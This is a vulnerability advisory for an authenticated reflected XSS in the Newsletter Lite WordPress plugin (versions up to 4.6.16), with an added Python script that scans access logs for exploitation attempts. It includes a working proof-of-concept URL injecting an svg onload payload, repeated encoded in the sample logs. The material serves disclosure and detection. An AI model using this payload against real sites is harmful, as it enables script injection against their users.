Newsletter Lite <= 4.6.16 - Authenticated Reflected XSS



Description
The ajax_load_new_editor() function, registered as an AJAX method, lacks CSRF, authorisation and sanitisation checks, which can lead to an authenticated reflected XSS issue.
Proof of Concept
As an authenticated user (with a role as low as a Subscriber), open https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea="><svg/onload=alert(/XSS/)>
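
To check whether this request pattern has reached a site, the following added example (not part of the original advisory) scans web-server access log lines for the newsletters_load_new_editor action carrying a contentarea value that is not a plain identifier. The combined log format, the identifier pattern assumed for legitimate values and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate contentarea value is a plain element identifier.
SAFE_VALUE_RE = re.compile(r'^[A-Za-z0-9_-]*$')
ACTION = "newsletters_load_new_editor"

def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, decoded contentarea) for requests worth reviewing."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if ACTION not in params.get("action", []):
            continue
        for raw in params.get("contentarea", []):
            value = fully_unquote(raw)
            if not SAFE_VALUE_RE.match(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jul/2019:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea=content HTTP/1.1" 200 512',
    '203.0.113.9 - - [02/Jul/2019:10:02:13 +0000] "GET /wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea=%22%3E%3Csvg%2Fonload%3Dalert(%2FXSS%2F)%3E HTTP/1.1" 200 540',
    '203.0.113.9 - - [02/Jul/2019:10:02:40 +0000] "GET /wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea=%2522%253E%253Csvg HTTP/1.1" 200 540',
    '198.51.100.7 - - [02/Jul/2019:10:03:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&contentarea=%3Cb%3E HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: contentarea={value!r}")
```

Access logs do not record POST bodies, so this covers only delivery through the query string, as in the proof of concept.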

Affects Plugin

Fixed in version 4.6.18

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Verified Yes
WPVDB ID 9447

Timeline

Publicly Published 2019-07-01
Added 2019-07-10
Last Updated 2019-07-16
